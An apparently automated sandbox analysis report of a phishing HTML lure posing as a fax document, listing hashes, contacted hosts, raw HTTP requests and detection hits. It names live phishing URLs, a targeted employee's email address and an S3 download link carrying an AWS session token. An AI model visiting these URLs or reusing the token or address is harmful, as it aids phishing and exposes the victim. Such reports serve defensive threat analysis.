nbbalsilk5euphzylvkimybmtiectf00%2ffhqo4eoclx5sgvdchqeq4bjqkaeyfm5a%2febzwf4uw87xmbquziribz00bbmxsr1f6inqrk5eiamnksyuyh%2fp3yjofau0ox8%2fovlihbkp3wtdzd5b5%2f5wwioymht1u0bdnhnt%2f%2b11yttesy4rc4fiydhkm7tzrfs9sa1wiiqxgqibqqjkrydzt%2flrmsyvtvk8wbscwkrvzxnu%2bsi4oujjhkmj27ywwc3ob5ne4d4%2fwryfib%2f4hwjo4&x-amz-signedheaders=host&x-amz-signature=4bd824e8586cb631d993afbaa40b83fff9764a3fdcecf7e4b686cf1557dfa0d0"	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\wget.exe

Queries volume information: C:\Users\user\Desktop\download VolumeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\wget.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
104.18.94.41	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
104.18.95.41	unknown	United States	13335	CLOUDFLARENETUS	false
108.167.169.75	inparsolucoes.com.br	United States	46606	UNIFIEDLAYER-AS-1US	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.185.164	www.google.com	United States	15169	GOOGLEUS	false
3.5.10.199	s3-w.us-east-1.amazonaws.com	United States	14618	AMAZON-AESUS	false
188.114.96.3	doctortarragona.com.de	European Union	13335	CLOUDFLARENETUS	false
142.250.186.132	unknown	United States	15169	GOOGLEUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
104.17.25.14	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.16
192.168.2.6

Contacted Domains

Name	IP	Active
s3-w.us-east-1.amazonaws.com	3.5.10.199	true
a.nel.cloudflare.com	35.190.80.1	true
cdnjs.cloudflare.com	104.17.24.14	true
doctortarragona.com.de	188.114.96.3	true
challenges.cloudflare.com	104.18.94.41	true
www.google.com	142.250.185.164	true
inparsolucoes.com.br	108.167.169.75	true
phisher-parts-production-us-east-1.s3.amazonaws.com	unknown	unknown
171.39.242.20.in-addr.arpa	unknown	unknown
www.inparsolucoes.com.br	unknown	unknown

Contacted URLs

Name	Malicious	Reputation
file:///C:/Users/user/Desktop/download/FaxDocument-873422-Wcepinc-Transmission.html	false	unknown
https://www.inparsolucoes.com.br/images/pbcmc.php?6104797967704b53693230746450795538757953387153537771536b7a507a307655533837503155744a3166637a4e416f6f30776341waxwork	false	unknown
https://www.inparsolucoes.com.br/favicon.ico	false	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/n38o4/0x4AAAAAAAxr5TbTd3MTHi9f/auto/fbE/normal/auto/	false	unknown

Name	Type	MD5	SHA1	SHA256
C:\Users\user\Desktop\cmdline.out	ASCII text, with very long lines (1858), with CRLF line terminators	57CA693473B970CE2076A59059CA14FA	4BA9D337BB20FC6B2C008D81B9C8B603E31013E5	C8BC022DDBC6A99B30B2864589F97A337915D7B051B5A392F50EEDA8A7DFEF16
C:\Users\user\Desktop\download\FaxDocument-873422-Wcepinc-Transmission.html	HTML document, ISO-8859 text, with very long lines (721)	C2D0F88B382452D67B83D0B765799D34	4BCEB970A2C6BFBF148BC8DE67FCD77D94FA1910	D493F6C6BDFDCF5959AE27C95155D91B5B3C1CE0BAB14EF02EA76D7C451B0EE9
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping764_1504294908\LICENSE	ASCII text	EE002CB9E51BB8DFA89640A406A1090A	49EE3AD535947D8821FFDEB67FFC9BC37D1EBBB2	3DBD2C90050B652D63656481C3E5871C52261575292DB77D4EA63419F187A55B
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping764_1504294908\_metadata\verified_contents.json	JSON data	68E6B5733E04AB7BF19699A84D8ABBC2	1C11F06CA1AD3ED8116D356AB9164FD1D52B5CF0	F095F969D6711F53F97747371C83D5D634EAEF21C54CB1A6A1CC5B816D633709
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping764_1504294908\manifest.fingerprint	ASCII text, with no line terminators	CFB54589424206D0AE6437B5673F498D	D1EF6314F0F68EFDD0BA8F6CA9E59BFF863B1609	285AC183C35350B4B77332172413902F83726CA8F53D63859B5DA082FD425A1C
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping764_1504294908\manifest.json	JSON data	C3419069A1C30140B77045ABA38F12CF	11920F0C1E55CADC7D2893D1EEBB268B3459762A	DB9A702209807BA039871E542E8356219F342A8D9C9CA34BCD9A86727F4A3A0F
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping764_1504294908\sets.json	JSON data	EEA4913A6625BEB838B3E4E79999B627	1B4966850F1B117041407413B70BFA925FD83703	20EF4DE871ECE3C5F14867C4AE8465999C7A2CC1633525E752320E61F78A373C
Chrome Cache Entry: 124	ASCII text, with very long lines (39801), with CRLF line terminators	9008D99307CBDF6E407F244B5046926D	024D018B444421FE65B0D30C7726CAD91FABE533	99736C803024D1B461DFC135749DE214885833918C9E7D6D38A017BA34D87A3A
Chrome Cache Entry: 125	ASCII text, with very long lines (47671)	EC4B20037C896C5F60640105C6EA36B1	A9A74169679305B6EF1B76470F5CB746D9420213	FBACCE424D00878284DB8C04089F007944324D9CD2432DB2472E4CF62A39DBBF
Chrome Cache Entry: 126	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced	9246CCA8FC3C00F50035F28E9F6B7F7D	3AA538440F70873B574F40CD793060F53EC17A5D	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
Chrome Cache Entry: 127	PNG image data, 75 x 26, 8-bit/color RGB, non-interlaced	81BEF95A686933165021F251A70A0BF0	8200119A7B3208EE8A71FFC09DA6519C2A2CD3E4	BA7204693B4A892B4AE74077D2E5C80C4684640569566CEEAA3902B0FA8FC9F7
Chrome Cache Entry: 128	ASCII text, with very long lines (47671)	EC4B20037C896C5F60640105C6EA36B1	A9A74169679305B6EF1B76470F5CB746D9420213	FBACCE424D00878284DB8C04089F007944324D9CD2432DB2472E4CF62A39DBBF
Chrome Cache Entry: 129	ASCII text, with very long lines (47992), with no line terminators	CF3402D7483B127DED4069D651EA4A22	BDE186152457CACF9C35477B5BDDA5BCB56B1F45	EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
Chrome Cache Entry: 130	ASCII text, with very long lines (47992), with no line terminators	CF3402D7483B127DED4069D651EA4A22	BDE186152457CACF9C35477B5BDDA5BCB56B1F45	EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
Chrome Cache Entry: 131	HTML document, ASCII text, with no line terminators	632A45F49AC298A622DD183EEEF06FC3	E1AAD675A48BB610D6D30013CDF4B8F4E2BCACC2	B9A77796E09E6F94119CF961B9525C18E08D01BB0F51DF25974DC187AB845428
Chrome Cache Entry: 132	HTML document, ASCII text, with CRLF, LF line terminators	F58515DFE987F7E027C8A71BBC884621	BEC6AEBF5940EA88FBBFF5748D539453D49FA284	679E7E62B81267C93D0778083AE0FD0EFE24172FF0AC581835B54165B3D9ED43
Chrome Cache Entry: 133	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced	9246CCA8FC3C00F50035F28E9F6B7F7D	3AA538440F70873B574F40CD793060F53EC17A5D	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
Chrome Cache Entry: 134	PNG image data, 75 x 26, 8-bit/color RGB, non-interlaced	81BEF95A686933165021F251A70A0BF0	8200119A7B3208EE8A71FFC09DA6519C2A2CD3E4	BA7204693B4A892B4AE74077D2E5C80C4684640569566CEEAA3902B0FA8FC9F7
Chrome Cache Entry: 135	HTML document, ASCII text, with very long lines (1413), with CRLF line terminators	2FD61E087E3C30133525FDD206B30DBA	B4DD2945C8C8D40BD530E6D86780C63A11346ADA	6B6D6DC23E1C33B8D725B78A85FA3CD9E4CAE595AC748BC7F1E24118695C9185
Chrome Cache Entry: 136	ASCII text, with very long lines (39457), with CRLF line terminators	5BEA091F572760BE199F5FF390B5037F	0978B8A75A24C2AA753E4362C015DD2442266101	EDB5C8FBE0E102835DB80E8E555BBA2D521E7FDE2BD33C949FDD6ACB7BB468FF

Phishing

Yara detected Phisher

Source: Yara match

File source: dropped/chromecache_131, type: DROPPED

Detected hidden input values containing email addresses (often used in phishing pages)

Source: https://www.inparsolucoes.com.br/images/pbcmc.php

HTTP Parser: aesparza@wcepinc.com

HTML page contains hidden javascript code

Source: file:///C:/Users/user/Desktop/download/FaxDocument-873422-Wcepinc-Transmission.html

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Source: https://www.inparsolucoes.com.br/images/pbcmc.php?6104797967704b53693230746450795538757953387153537771536b7a507a307655533837503155744a3166637a4e416f6f30776341waxwork

Source: file:///C:/Users/user/Desktop/download/FaxDocument-873422-Wcepinc-Transmission.html	HTTP Parser: No favicon
Source: https://www.inparsolucoes.com.br/images/pbcmc.php	HTTP Parser: No favicon
Source: https://doctortarragona.com.de/N12Pv/#8aesparza@wcepinc.com	HTTP Parser: No favicon
Source: https://doctortarragona.com.de/N12Pv/#8aesparza@wcepinc.com	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.10.199:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.242.39.171:443 -> 192.168.2.6:57019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:57027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:57043 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:57053 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:57063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:57081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:53007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:53011 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:53014 version: TLS 1.2

Source: chrome.exe

Memory has grown: Private usage: 8MB later: 34MB

Detected non-DNS traffic on DNS port

Source: global traffic	TCP traffic: 192.168.2.6:52967 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.6:57011 -> 162.159.36.2:53

Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45

Source: global traffic	HTTP traffic detected: GET /68a29cbc-d8f9-4c01-aa8b-704c527e3dea/2024-10-24/hdp1f4m0mtn58r7e5djj3r2baep1oktpuitii5o1/d493f6c6bdfdcf5959ae27c95155d91b5b3c1ce0bab14ef02ea76d7c451b0ee9?response-content-disposition=attachment%3B%20filename%3D%22FaxDocument-873422-Wcepinc-Transmission.html%22%3B%20filename%3DUTF-8''FaxDocument-873422-Wcepinc-Transmission.html&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIA37KREM2QLQCGJML5%2F20241024%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241024T201816Z&X-Amz-Expires=15711&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEHMaCXVzLWVhc3QtMSJIMEYCIQD5%2BhZvZGN6J3Fxb1eh7JhGJFYatdM4YSe%2FB1Lhu54clwIhAMGxuFEnQyuPv%2FCfNJf%2FM%2Bjk%2FqrMeNeOhUAY3BKeKKVEKogECNz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMODIzMTkzMjY1ODI0IgxkadsnklCVctvwMWIq3APvQpQpI58knFBaUI%2FesQH1FJlTX%2BlsdPXwHmIEoA7JJLDUXnDzzteCVoUwvp1olI1h3PTJSpl3WxfIUi7BTzihzEqp3qn85AWXiDO1fWB1MbpD%2FSDfsrqMEgho9OQjpzPsQHM6e%2BmLmZ1yTIHD97Pf%2FN08letrYEZz2NFJVIQrLYTvWQwr2QPEZJyIm0WnuSbbq8Q1iYmha%2FIyVB9ZKxOPpvdgR1ptXZ6oLjzsy%2Bt%2BjafEISWZYsRDWwvLzIujqWG%2B63t%2BpCq3bxmYAsSHjxnzarIm7Hms4AOj9sIvR9pkL0wwD3qkWG7oBYHnb8k0%2B1AzzdJ2e%2FfLVD9TiwcG1KsTEzsabHJpEEBXTzducKIDP%2FcB%2FYcv03kyJnwWzUMaIbwdRV3lLj4itVuLpZpUbOm8RJChRMb83TR2qZdNKkjYktSR42en1uqps%2BU0qDC%2Fg93%2FFw2lIXwuMoTybf1fWYEY2OQz6E5eRoigwQhmg4wJe1ZZgjwP8fEQSG0yo9XZnXr%2FyAu%2BEt2RNzWy2wHuoZk3HVwPs4lWnhTyTcrSndmgKXkfVSpHeqCqkF3xveAbEhd%2F9qQutDIIcWnBBAlsILK5EUpHzYLvkIMYBMTieCtf00%2FFHqO4eOCLX5sGvDCHqeq4BjqkAeyFM5a%2FebzwF4uw87xMbquzIriBZ00BbMxSr1F6iNQrK5eiAmnkSYUYh%2Fp3YJofaU0ox8%2FOVLIHBKp3WtDzd5b5%2F5WwioyMhT1u0BDnhNT%2F%2B11YTTeSy4rC4fIYdhkm7tZrFS9Sa1WIiQXgQiBqqjkRydZT%2FLrmsyVTvK8wBscWkRvZxnU%2Bsi4OUJJHkmJ27ywwC3Ob5nE4D4%2FwrYfIb%2F4HWJO4&X-Amz-SignedHeaders=host&X-Amz-Signature=4bd824e8586cb631d993afbaa40b83fff9764a3fdcecf7e4b686cf1557dfa0d0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: /*Accept-Encoding: identityHost: phisher-parts-production-us-east-1.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /images/pbcmc.php?6104797967704b53693230746450795538757953387153537771536b7a507a307655533837503155744a3166637a4e416f6f30776341waxwork HTTP/1.1Host: www.inparsolucoes.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /images/pbcmc.php?6104797967704b53693230746450795538757953387153537771536b7a507a307655533837503155744a3166637a4e416f6f30776341waxwork HTTP/1.1Host: www.inparsolucoes.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.inparsolucoes.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.inparsolucoes.com.br/images/pbcmc.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
